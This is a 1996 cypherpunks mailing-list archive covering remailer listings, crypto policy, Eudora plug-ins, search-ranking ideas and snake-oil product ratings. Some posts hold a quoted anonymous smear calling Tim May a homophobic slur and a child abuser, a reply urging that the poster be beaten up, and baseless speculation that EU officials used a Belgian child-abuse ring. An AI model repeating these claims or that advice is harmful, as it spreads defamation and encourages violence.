clapping in a forest with no one there to hear it?" I use Pronto Secure (tm) PGP-fluent Email software for Windows -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMkYXlcVrTvyYOzAZAQGcxgQAleY6gXoM1n0AbYSUogW9Zo4brlHgsEHW vs3aAh+DQEaWJKc9ltXlDK94su9uJbAo3gb4cvG0EnBDifpqlS/bya7fG9KlcM6H k6REe2Ui6xBLtbjJTa5fmAjmeLYPSKnF5z6Eql8VpdZPoS0hqKZKgdyogMrai4Dx esOt90XBqVk= =hibj -----END PGP SIGNATURE----- From jya at pipeline.com Mon Sep 23 14:54:30 1996 From: jya at pipeline.com (John Young) Date: Tue, 24 Sep 1996 05:54:30 +0800 Subject: SAK_net Message-ID: <199609231550.PAA28937@pipe3.ny3.usa.pipeline.com> 9-23-96. WaJo: "SAIC Is Near Agreement to Buy Bellcore" Bellcore led a team that cracked RSA-129, a computer code once thought uncrackable, proving the vulnerability of such systems. It holds hundreds of patents governing numerous aspects of the U.S. infrastructure. SAIC specializes in systems integration, national security, transportation and health care. SAIC is expected to tap into Bellcore's considerable software talent as it continues to pursue new contracts. Bellcore boasts network expertise that is second to none. Bellcore also helps companies recover from network failures, and its experts are widely regarded as masters at foiling computer viruses and at the intricacies of technical standards. Those talents will no doubt add value to SAIC's considerable technical assets and expertise. ----- http://jya.com/saknet.txt (7 kb) SAK_net From raph at CS.Berkeley.EDU Mon Sep 23 14:59:44 1996 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Tue, 24 Sep 1996 05:59:44 +0800 Subject: List of reliable remailers Message-ID: <199609231350.GAA29493@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail. For more information, see: http://www.c2.org/~raph/premail.html For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"extropia"} = " cpunk pgp special"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"penet"} = " penet post"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post reord"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"ecafe"} = " cpunk mix"; $remailer{"amnesia"} = " cpunk mix pgp hash latent cut ksub"; $remailer{'alpha'} = ' alpha pgp'; $remailer{'nymrod'} = ' alpha pgp'; $remailer{"lead"} = " cpunk pgp hash latent cut ek"; $remailer{"nemesis"} = " cpunk pgp hash latent cut"; $remailer{"exon"} = " cpunk pgp hash latent cut ek"; $remailer{"vegas"} = " cpunk pgp hash latent cut"; $remailer{"haystack"} = " cpunk mix pgp hash latent cut ek"; $remailer{"ncognito"} = " mix cpunk pgp hash latent"; $remailer{"lucifer"} = " cpunk mix pgp hash latent cut ek"; $remailer{"jam"} = " cpunk mix pgp hash latent cut ek"; $remailer{"winsock"} = " cpunk pgp hash cut ksub reord"; $remailer{'nym'} = ' newnym pgp'; $remailer{"balls"} = " cpunk pgp hash latent cut ek"; $remailer{"squirrel"} = " cpunk mix pgp hash latent cut ek"; $remailer{"middle"} = " cpunk mix pgp hash middle latent cut ek reord"; $remailer{'cyber'} = ' alpha pgp'; $remailer{"dustbin"} = " cpunk pgp hash ksub latent cut ek mix reord"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Groups of remailers sharing a machine or operator: (cyber mix) The alpha and nymrod nymservers are down due to abuse. However, you can use the cyber nymserver. The nym.alias.net server will be listed soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details. 403 Permission denied errors have been caused by a flaky disk on the Berkeley WWW server. Hopefully, this is fixed by now. The penet remailer is closed. Last update: Mon 23 Sep 96 6:46:13 PDT remailer email address history latency uptime ----------------------------------------------------------------------- squirrel mix at squirrel.owl.de ++++.+---++ 2:19:14 99.99% jam remailer at cypherpunks.ca ************ 16:28 99.98% mix mixmaster at remail.obscura.com ++--.+-++++- 1:07:11 99.98% cyber alias at alias.cyberpass.net +*+ -*-***** 29:26 99.86% exon remailer at remailer.nl.com #****# #*+## 1:12 99.84% replay remailer at replay.com *********+** 4:14 99.55% dustbin dustman at athensnet.com ------+++-+ 1:01:14 99.54% winsock winsock at c2.org --++.------- 3:29:10 99.49% lead mix at zifi.genetics.utah.edu ++++++-+ ++* 35:32 99.43% extropia remail at miron.vip.best.com --.-.------ 8:25:42 98.99% middle middleman at jpunix.com - --- -- - 2:14:50 97.72% balls remailer at huge.cajones.com * * ******* 5:01 97.12% haystack haystack at holy.cow.net ####### #--# 55:47 96.49% amnesia amnesia at chardos.connix.com ----.- ---- 4:41:47 94.33% History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From DMiskell at envirolink.org Mon Sep 23 15:03:08 1996 From: DMiskell at envirolink.org (Daniel Christopher Miskell) Date: Tue, 24 Sep 1996 06:03:08 +0800 Subject: Public Schools Message-ID: >An awful lot of accomplished persons grew up in isolated areas, on small >farms, and were educated in very small classrooms (or at home). I can speak of this from experience. I (currently) live in the near vacinity of a town we amiably named "cowtown", and used to go to a small ton high school. As it turns out, one of the graduates before me at that school went on to become an astronaut -- after living in almost-vacant "cowtown" all his life. Makes /me/ proud to be a citizen of such lightly populated areas. Besides that, it's quieter, safer, and if the government comes for me, I have a kill zone of at least 5 miles. Woohoo! Daniel. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? -- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From trei at process.com Mon Sep 23 15:03:22 1996 From: trei at process.com (Peter Trei) Date: Tue, 24 Sep 1996 06:03:22 +0800 Subject: More proposals for European censorship Message-ID: <199609231442.HAA20480@toad.com> Asgaard writes: > On Thu, 19 Sep 1996, E. Allen Smith forwarded: > > >> STRASBOURG, France (Sep 19, 1996 11:24 a.m. EDT) - The European > >> Parliament pressed the European Union on Thursday to act to curb child > >> sex and trafficking rings, saying the fight against sexual abuse of > >> children must be an "absolute priority." > It's probably no coincidence that the recently busted, utter horrible > child-molesting ring, with obvious protection from various persons > in the establishment, was centered in Belgium - that's where the EU > bureaucrat nomenklatura play their power games and go to bordellos. > Asgaard What exactly are you suggesting when you say 'it's probably no coincidence?" I can't quite figure it out. [While I've not been following the case in detail, it involves a ring of criminals in Belgium who kidnapped children to use them in child pornography. At least two little girls were starved to death when they're usefullness was over.] Are you suggesting that someone specifically set up a ring of child pornographers/murders in Belgium, then let it get caught, in an attempt to influence the EU parliment? Or are you suggesting that this particular gang of sub-humans was exposed at this time in an attempt to influence policy, implying that the Belgian LEAs knew about, but did not stop the ring until they needed a publicity coup? I find such notions utterly beyond rationality. Do you expect we're going to see a statement from some Belgian police investigator to the effect of "Yes, I knew they were raping and killing children, but was told to do nothing, and I obeyed."? There is a tendency of many on this list to demonize those we disagree with. If a person or group takes the 'wrong' stance on cryptography, key "escrow", etc, many list members will act as if that person or group were capable of any atrocity, and is acting out of the very worst of motives and hidden agendas. Such an attitude is common, but not desirable in the modern world. It served some purpose when war involved the literal massacre of one's opponents - it's easier to commit genocide against the tribe over the ridge if you demonize them into not-quite-humans, but in the modern world this is not a rational option. While it's possible to regard many policies of governments, ill-informed, self-serving, populist, and wrong, to act as if there is no significant differences between real democracies and the worst authoritarian dictatorships is absurd. Peter Trei (not representing my employer) trei at process.com "Your enemy is never a villain in his own eyes. Keep this in mind; it may offer a way to make him your friend. If not, you can kill him without hate -- and quickly. " - Heinlein Reccomended for US readers: "Parliment of Whores" by PJ O'Rourke From jimbell at pacifier.com Mon Sep 23 15:06:33 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 24 Sep 1996 06:06:33 +0800 Subject: USA_exe Message-ID: <199609231819.LAA19661@mail.pacifier.com> At 08:27 AM 9/23/96 -0700, Brian D Williams wrote: > > >John (jya at pipeline.com) posts: > >>The Washington Post reports at length today on the Defense >>Department's disclosure yesterday of heretofore classified >>training manuals used in the School of the Americas to instruct >>Latino troops on killing a wide range of civilians for political >>purposes. > >This is not particularly new news, I have a copy at home of one of >these manuals, it was put out by a humans rights group that got >their hands on it during all the El Salvador business. > >It's as nasty as it sounds... I don't suppose we need ask the question about whether such manuals were classified to keep their contents away from the enemy...or the American people. Ooops, same thing I guess. Jim Bell jimbell at pacifier.com From asgaard at Cor.sos.sll.se Mon Sep 23 15:11:30 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Tue, 24 Sep 1996 06:11:30 +0800 Subject: provably hard PK cryptosystems In-Reply-To: Message-ID: On Sun, 22 Sep 1996, Timothy C. May wrote: > Suppose a tile is placed at some place on the grid, and another tile > (possibly a different tile, possibly the same type of tile) is placed some > distance away on the grid. The problem is this: Can a "domino snake" be > found which reaches from the first tile to the second tile, with the > constraint that edges must match up on all tiles? (And all tiles must be in > normal grid locations, of course) Intuitively (but very well not, I'm not informed enough to know) this might be a suitable problem for Hellman's DNA computer, the one used for chaining the shortest route including a defined number of cities? Asgaard From asgaard at Cor.sos.sll.se Mon Sep 23 15:11:58 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Tue, 24 Sep 1996 06:11:58 +0800 Subject: More proposals for European censorship In-Reply-To: <199609231433.QAA20666@slld01.SLL.SE> Message-ID: On Mon, 23 Sep 1996, Peter Trei wrote: > > It's probably no coincidence that the recently busted, utter horrible > > child-molesting ring, with obvious protection from various persons > > in the establishment, was centered in Belgium - that's where the EU > > bureaucrat nomenklatura play their power games and go to bordellos. > What exactly are you suggesting when you say 'it's probably no > coincidence?" I can't quite figure it out. Obviously not only the arrested killer used the schoolgirls chained in underground cells. They were for hire. High officials used his 'services', then ordered the police to cover it up. Why else would some ten policemen be arrested? The EU bureaucrats are served by hordes of prostitutes. Surely there are pedophiles among the hordes. Probably some EU pedophiles have a connection to the gang. I don't know this of course, but speculation is cheap. Asgaard From stewarts at ix.netcom.com Mon Sep 23 15:15:30 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Tue, 24 Sep 1996 06:15:30 +0800 Subject: Snooping ISP admin?? Message-ID: <199609231830.OAA19726@attrh1.attrh.att.com> At 06:15 AM 9/23/96 -0700, "Michael E. Carboy" wrote: >Question for the group: I have encountered a situation that causes me >to believe an ISP is snoopingthrough encrytped mail. It seems that >PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. Well, if it's encrypted, it shouldn't matter much if they're snooping :-) >I have >encountered "POP3 account in use by another user" several times in the >past few days and I am the only user... wondering if that "in use" >messsage is the result of a clumsy sysadmin being caught with his hand >in the cookie jar. Three possibilities 1) The sysadmin (unlikely). Aside from the fact that most sysadmins know better, it's easier for them to just copy your mailbox to /tmp and read it with emacs instead of using the POP handler to read it. 2) Crackers, especially if you've got a wimpy password 3) System problems - I use Eudora with my Netcom account, and sometimes I'll have bad modem connections or Windoze crashes that will hang my computer or connection in the middle of fetching mail. This leads to that kind of symptom - the server doesn't quite realize that I've hung up. Usually this times out in an hour or two, but your mileage may vary, especially depending on you're ISP's POP server. Start by assuming it's a computer problem, then try attributing stupidity, and only then go for malice. :-) And if they are snooping, asking them about the "technical" problems you're having would at least let them know to stop it. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From eric at sac.net Mon Sep 23 15:18:34 1996 From: eric at sac.net (Eric Hughes) Date: Tue, 24 Sep 1996 06:18:34 +0800 Subject: List participation Message-ID: <2.2.32.19960923172509.00d6e4e4@flamingo.remailer.net> I have been informed that Dr.Dimitri Vulis KOTM wrote: > [...] Tim's off-topic spews have driven Eric Hughes, John Gilmore, > Rich Salz, and many other former valuable contributors off the > mailing list [...] As for me, I stopped having time to read cypherpunks a year and a half ago. Tim had nothing to do with it. The cypherpunks list has changed and I have changed; so be it. Eric From cbarnett at eciad.bc.ca Mon Sep 23 15:30:58 1996 From: cbarnett at eciad.bc.ca (Clint Barnett) Date: Tue, 24 Sep 1996 06:30:58 +0800 Subject: crypto anarchy vs AP In-Reply-To: <199609221810.TAA00172@server.test.net> Message-ID: >government power will just be gradually eroded as international >businesses gain power, and borders become more open, trade more free, as >travel becomes cheaper, and moving to another country becomes less of a >hassle. Okay, from the top: there are a number of reasons why this won't happen. One of the most obvious being that businesses are NOT in the business of helping people, they are in the business of making money. Trade will not become free, travel will not become cheaper, and if they are given the powers of a government they would not likely let it's consumer base move to a country with a better dental plan, thus borders would not become more open. In fact, I can easily picture business leaders inthe throes of ecstacy over the prospect of having 260 million people who have no choice but to buy their product because there are no other manufacturers. Another reson is that government is like a giant bumblebee, not too bright, but if you keep poking at it with a sharp stick it will sting you. Government officials are interested in keeping their cushy jobs and expensive hookers, if they start to feel threatened by crypto anarchy, who do you think they're going to retaliate against? The guy who runs the blockbuster video on the corner? >to create the appearance of as free a life style as they can for >individuals ever read "1984"? the appearance of a free lifestyle is most definitely not a free lifestyle. I am hardly a friend of the state, and far from being an advocate of the church, but multinational corporations running the world for their own fun and profit makes my sphincter clench. clint barnett emily carr institute From stewarts at ix.netcom.com Mon Sep 23 15:37:42 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Tue, 24 Sep 1996 06:37:42 +0800 Subject: Bernstein Case in "The Recorder", SF Law newspaper Message-ID: <199609231817.OAA16098@attrh1.attrh.att.com> I didn't have 4 quarters handy to feed the newspaper machine, but "The Recorder", a San Francisco law newspaper, has a headline today about "Feds On The Ropes In Export Law Suit", about the Bernstein case. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From vznuri at netcom.com Mon Sep 23 15:42:01 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Tue, 24 Sep 1996 06:42:01 +0800 Subject: possible solution to cyber S/N Message-ID: <199609231847.LAA29832@netcom5.netcom.com> I've written many times on the problem of signal to noise here in cyberspace and have tried to think through some elegant solutions to this very vexing problem. moments ago I just came up with an intense brainstorm fully worthy of sharing with the list . it's clear that the web functions very much like a directed graph in many ways. sites and traffic between them are one graph. however, another graph involves thinking of each page or "article" on the web as a single node in the graph, and hyperlinks as the edges between the nodes. what we have today is a directed graph in which one can follow the forward direction of hyperlinks very readily. however, it is much more difficult to follow the reverse direction, i.e. find "all the sites that reference this paper". of course this is part of the beauty of the web, that anyone can link to anyone without actually having to register or something like that. the "referrer log" feature on a server is a mechanism that does allow a server to get some idea of who is linked up to that site. the basic idea I have is that references are an excellent way of discriminating Signal to Noise and are used routinely in the scientific arena. a paper that is pivotal and influential is referred to ad infinitum. obscure papers are forgotten and never referred to in subsequent literature. taking this idea to the cyberspace arena, the application is immediately obvious-- pages that are linked to by a lot of other pages are valuable, those that are not are not as valuable. (another closely related idea is how much hit traffic a web site gets-- wouldn't it be a *tremendous* improvement in the current search engines if they returned the pages ranked according to how many hits they get per time?) there are some problems with all the above, however. currently only the site that actually houses the pages can keep track of hits, and referrers are not very well kept track of at all. in a robust system, cheating, such as reporting more hits than one is getting, would not be possible. anyway, I tend to think that future S/N problems in cyberspace are increasingly going to be solved in some particular ways that are just now being tried out: 1. rating agencies. agencies that both reject and find "cool stuff" (like Point Communications etc.) 2. hit statistics. how many people are hitting various pages? if we could get an arbitron-like system that works the same way that newsgroup readerships are now reported (each site compiles statistics and sends them to centralized databases) we could have search engines that rank results according to hit statistics. I'm not saying it would be perfect, and there are all kinds of obvious nitpicky things that people here will harp on, but I still insist it would be better than no statistics at all. eventually a system like this that involved voluntary submissions of hit counts to the centralized servers (or just some way of search engines to get hit statistics from servers about the pages they own/serve) may evolve into a more robust system that makes cheating impossible (such as falsely reporting a high hit count to attract people to the site). 3. linking statistics. again, I think this is an extremely powerful way of separating signal from noise-- how many other sites are linked to the page in question? if it has few links, it isn't as interesting, if a lot of other people point to it, it's far more interesting. I encourage system designers to keep some of these ideas in mind when they are working on the current generation of software tools such as search engines etc. in particular there is a tremendous amount of innovation going on right now between search engine designers, and adopting some of the above ideas into a search engine might be a very powerful way of distinguishing it from the "competition" by returning more useable search results to the end user. again, I suspect we will be seeing increasingly ingenious and efficacious ways of dealing with what today is the horrible S/N problem. perhaps today will be thought of as the dark age of cyberspace because of all the muck we are routinely wading through From cbarnett at eciad.bc.ca Mon Sep 23 15:42:16 1996 From: cbarnett at eciad.bc.ca (Clint Barnett) Date: Tue, 24 Sep 1996 06:42:16 +0800 Subject: A daily word of caution in reference Tim C[unt] May In-Reply-To: <199609230540.BAA16639@godzilla.athensnet.com> Message-ID: is this kind of crap really necessary? Are you that bored? If you have a problem, go to his house and beat him up. As for you Tim C. May, call your friends and wait in the bushes for this asshole to show up at your house. Maybe the rest of them will get the hint that this waste of time is deeply unappreciated. clint barnett lord of the cosmos emily carr institute On Mon, 23 Sep 1996, Dustbin Freedom Remailer wrote: > Tim C[unt] May is not only as queer as a three dollar bill, but he is also into > having sex with children. > From ddt at lsd.com Mon Sep 23 15:46:13 1996 From: ddt at lsd.com (Dave Del Torto) Date: Tue, 24 Sep 1996 06:46:13 +0800 Subject: Eudora 3 EMS API stuff Message-ID: Anyone interested in creating plug-ins for Eudora 3.x that provide encryption/remailer/etc support needs this information. dave ................................. cut here ................................. ABOUT THE API The EMS API is one of several complimentary facilities available for integrating 3rd party applications and services with Eudora email. "Plug-ins" interface with Eudora via the EMS API. For Windows the plug-ins are DLL's and on the Macintosh they are Components. Abstractly speaking, the EMS API is most suited for performing transformations, conversions and some other forms of processing on email messages as they are sent and received by Eudora. In practice it is very useful for encryption, digital signatures, and compression. These are all processes that involve encapsulating a message attachments and all. The EMS API is also very useful for text processing and conversions. These might include simple formatting and sorting utilities, or human language translation, and some forms of text-based encryption. EMS API plug-ins can be used to do data format conversions on things ranging from graphic images in attachments to international character sets. Another interesting category are plug-ins that process messages in some way, but don't necessarily change them. For example, a plug-in could be set up so that it scans certain messages for updates to a database like a catalog and automatically makes the change in the local database. Another could be used to scan incoming message attachments for viruses. In a sense, plug-ins can function as filters. DOCUMENTS AND SDK As of the end of July we have documentation and support available at as follows: emsapi1.pdf - Adobe Acrobat document describing API version 1 (current on Mac) emsapi2.pdf - Acrobat document describing the API version 2 (current for Windows) chngs2.pdf - Acrobat document showing changes between version 1 & 2 EMS-API-SDK-1.0b3.hqx - Macintosh developer's kit ems1b2.zip - The Windows software developer's kit The developers kit includes a number of support utilities and source code for four sample plug-ins. CURRENT STATUS As of the end of August, Macintosh Eudora Pro 3.0 is shipping and supports the EMS API version 1. The current Macintosh Eudora Lite (the free version) does not support the EMS API, but it will and a beta version is expected in early September if not sooner. Version 1.0b3 of the SDK for the Macintosh is currently available from our FTP site. Windows Eudora 3.0 is in beta test right now and supports EMS API version 2. A copy can be obtained from our ftp site. Version 1.0b2 (a public beta release) of SDK for the API is also now available from our ftp site. MAILING LIST AND MORE INFORMATION If you have specific questions about the API you can write to . If you'd like to keep up to date on the API you can join a mailing list we have for announcements and discussions. To join, send a message to . This mailing list is manually administered and is not a listserv, majordomo or listproc, so no special formatting is needed in the request message. From rah at shipwright.com Mon Sep 23 15:53:09 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 24 Sep 1996 06:53:09 +0800 Subject: BAA, BAA, SAY THE SHEEPLE Message-ID: --- begin forwarded text Mime-Version: 1.0 Date: Mon, 23 Sep 1996 08:24:36 -0700 To: , rah at shipwright.com From: Subject: BAA, BAA, SAY THE SHEEPLE COLORADO SENATOR CHARLES DUKE ON THE LOSS OF LIBERTY By Senator Charles R. Duke, September 16, 1996 Colorado District 9, (719) 481-9289 BAA, BAA, SAY THE SHEEPLE Who would have thought America would be where it is today? Earlier in the week, news stories appeared announcing that a proposal to do background checks on regular passengers came from a commission studying terrorism. This, of course, would do absolutely nothing to stop terrorism. Any decent terrorist knows enough to not travel under a real name. In any case, most airline terrorist incidents will likely be caused by someone who doesn't fly on the same plane for which the incident is planned. Since these ideas are patently obvious to the most casual observers, what, then, is the purpose of this tyranny? Is it simply to get the American sheeple so accustomed to government spying that we don't mind? To do this would require some sort of identification number and what better number to use than the Social Security number? Having the SSN flying around all these databases would also allow those who have access to such numbers to examine our bank records and credit history, along with many other records. Oh, nuts, I say. This proposal is just too depressing. So I pick up the Wall Street Journal for Friday the Thirteenth of September. Might as well read a little financial news to get in a better mood. I mean, our economy is really doing okay, or at least so the government would have us believe. I never got to the stock tables. There, on the front page, is a story from San Mateo, California, where den mothers, coaches, and other volunteers who work with children will now be subjected to fingerprinting and background checks. The idea, you see, is to keep our children safe from child abuse. Don't look now, Toto, but this doesn't feel like Kansas, anymore. This will be totally ineffective at curbing child abuse, but you probably already knew that. This writer knows something about child abuse and can assure everyone that the overwhelming majority of child molesters become neither den mothers nor coaches. We have a Fourth Amendment to our U.S. Constitution that flatly prohibits these unreasonable searches and seizures. Specifically, the Amendment states, "The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched and the persons or things to be seized." It means that our private effects and our private lives are none of any civil authority's business, unless they have probable cause, and can obtain a warrant, sworn to by an oath or affirmation before a judge. The only way any nosy government gets away with this open and flagrant violation of constitutional rights is if the sheeple allow it. Where is the hue and cry from everyone about these measures? Have we become so conditioned to prying eyes that we have forgotten what privacy is about? Why are you, who have the courage to read this column, just standing idly by and letting our God-given rights be stripped from us on a daily basis? Where are the letters to the editor and civil demonstrations about this blatant tyranny? Our forefathers paid for these rights with their lives and their blood. They must be churning in their graves with the lackadaisical attitude we have today about our Constitution. They fought a War for Independence because King George was allowing warrantless searches and incarcerations. It was considered by our Founding Fathers to be a sacrilegious violation of rights granted to us by our Creator and not subject to the rule of Man. Somehow, in 1996, we have been lulled into complacency and apathy by a government totally dedicated to the absolute subjugation of our free will. Most of us have never really been free. We have been enslaved so long it is not clear we would know how to behave if by some process we had our real freedom restored. It is possible the American people actually deserve what is about to happen to us. We deserve it because of our collective inaction, our collective morals, our collective set of values, and our collective embrace of a failed political process. There are many examples in history where societies created and led by moral and just people have lasted for long periods. Almost without exception, the collapse of these societies were preceded by a loss of character in the people governed. Where would you put America today? --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From wendigo at pobox.com Mon Sep 23 15:55:26 1996 From: wendigo at pobox.com (Mark Rogaski) Date: Tue, 24 Sep 1996 06:55:26 +0800 Subject: Snake-Oil FAQ In-Reply-To: Message-ID: <199609231616.MAA01276@charon.gti.net> -----BEGIN PGP SIGNED MESSAGE----- An entity claiming to be Lance Cottrell wrote: : : >I think a blacklist of that sort is inherently bad. I would much rather : >have the public be able to RECOGNIZE SYMPTOMS of snake oil, rather than : >just be spoon fed a list of good products vs. bad products. Pardon the : >cliche, but if you give a man a fish ... etc, etc. : > : >mark : > : : I agree in principle, but for the foreseeable future I think the list will : be a "good thing". : As long as the descriptions of the products are comprehensive. Concern about legal issues has been expressed from the beginning. But, I don't think that libel/slander laws will be a stumbling block, as long as the publication is similar in nature to "Consumer Reports" or somesuch. : "Love is a snowmobile racing across the tundra. Suddenly : it flips over, pinning you underneath. At night the ice : weasels come." : --Nietzsche Matt Groening? mark - -- Mark Rogaski | Why read when you can just sit and | Member GTI System Admin | stare at things? | Programmers Local wendigo at gti.net | Any expressed opinions are my own | # 0xfffe wendigo at pobox.com | unless they can get me in trouble. | APL-CPIO -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMka3wxz4pZwIaHjdAQHm1gf/XTf+a2znIKWNWebUtWUDQnf2ypjX6QOY nTz3C3bjaoEqn0QicoDr3cvw7DgAde7taNK2RRUSB5wHdmhS4wSE3qacGcyLqmJ4 E51oUYoHoWju+JdTsFDq7IXeqzRhTh2WSdQx52OV7VG+PsFg6AICcDI+28sDqabU Z+H/3GpOezJqvRRAZEjUzqvKX4HEfs9BQgmlLdXGCRZQ52AxIxE44z8kQpgE2s66 iiPhUEdaSYBnwJGgngpTAVIOPZJYHZG+NthvJpwX/sQFSmTOeIGf6KcKm2nlF+4X cUELlHi8s9EqmEp/FlzKLQXd+Fd0QL20kNd+sshzU37HYnTKVDn75w== =dHBB -----END PGP SIGNATURE----- From tcmay at got.net Mon Sep 23 16:19:20 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 24 Sep 1996 07:19:20 +0800 Subject: Snake Oil Lists, Blacklists, and Anonymity Message-ID: At 4:16 PM 9/23/96, Mark Rogaski wrote: >An entity claiming to be Lance Cottrell wrote: >: I agree in principle, but for the foreseeable future I think the list will >: be a "good thing". >: > >As long as the descriptions of the products are comprehensive. Concern >about legal issues has been expressed from the beginning. But, I don't >think that libel/slander laws will be a stumbling block, as long as >the publication is similar in nature to "Consumer Reports" or somesuch. I have to agree with Lance that the "ratings list" is more important and more useful than the "FAQ." (My comments about the "Snake Oil FAQ" were directed towards the _educational_ aspects of the FAQ, which I believe are covering territory already well-covered by good books and existing FAQs. A list of thumbs ups and thumbs downs, dynamically changing, is another matter--it is _not_ something covered in published books, due to the time factor, and would be a contribution.) However, bear in mind that such a list of products could involve legal battles. The mention of "Consumer Reports" is apropos of this. CR has been sued many times, and has a staff of lawyers both reviewing all articles they post for any hint of litigatable (?) reviews, and for dealing with the corporate lawyers of companies whose products did not fare well in the CR reviews. (Recall certain high-profile cases such as the sport utility vehicle "roll-over" tests.) Also, one of the audio magazines (or possibly even CR itself...my memory has faded) was sued in the 1970s by Bose Corporation for an unflattering review of Bose's flagship loudspeakers, the Bose 901s. The magazine basically said Bose's "direct-reflecting" multipattern array of small cones was "snake oil." (I don't know if the mag used this term, but this is what they said. And "snake oil" is a term used a _lot_ in the audio community, where snake oil salesmen sell things like the "Tice Clock," an ordinary LED clock ($7 at Radio Shack) which has been "cryogenically processed" and which, Tice claims, when plugged in to any wall outlet in the listening room will improve the soundstage, improve the sound by interpolating bits into the harsh digital stream, blah blah blah. Of course, Tice charges $200 for their special snake oil clock.) Back to the list of products. It would be best to handle it through an anonymous remailer...what others do with it, in terms of reposting it to public newsgroups (where Deja News, Yahoo, Alta Vista, etc. could find it), is their business. Reviews should be digitally-signed, probably by pseudonyms. The "anonymous reviewers" would actually be pseudonymous, and reputations would develop over time. (TANSTAAFL) The BlackNet model (message pools) could be used to get responses (letters to the editor?) back from customers, so that one might see messages like: "My company bought 5 copies of the SnakeTronics ScrambleMatic product, and found the key is stored in plaintext in the scramble.config file! Needless to say, we have stopped using ScrambleMatic and have asked SnakeTronics for our money back! signed, DisgruntledUser." (In other words, a formal rating or evaluation, perhaps from A to F, or 10 to -10, etc., could be supplemented with "blurbs," both positive and negative, from users.) The reason I recommend anonymous remailer distribution, and pseudonyms, is because of the litigation issue. Even if reviewers are not sued often, the threat of a suit influences reviews, which is why most reviews in most mags are puff pieces (glowing reviews, often strongly correlated with who is advertising in the mag). One can imagine Matt Blaze, for example, choosing to say _nothing_ about SnakeTronics' ScrambleMatic, for fear (justified) that he might get letters from their lawyers, thus taking up his time and even eventually landing him in court. Also, this sort of "blacklist" paves the way for similar anonymously-situated blacklists of doctors, lawyers, etc., and you can bet your last dollar that a list of "bad doctors" would be aggressively pursued in the courts of all major countries! Hence the use of remailers and BlackNet-style message pools will be paramount for such things. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From wendigo at pobox.com Mon Sep 23 16:28:26 1996 From: wendigo at pobox.com (Mark Rogaski) Date: Tue, 24 Sep 1996 07:28:26 +0800 Subject: Snake-Oil FAQ In-Reply-To: Message-ID: <199609231634.MAA02010@charon.gti.net> -----BEGIN PGP SIGNED MESSAGE----- An entity claiming to be Timothy C. May wrote: : : The Basic Problem (tm) with a "Snake Oil FAQ" is that the very persons most : in need of it won't read it. : : If those who post descriptions of their "Unbreakable Virtual Whammo-Matic : Really Complicated Transposition Cipher" 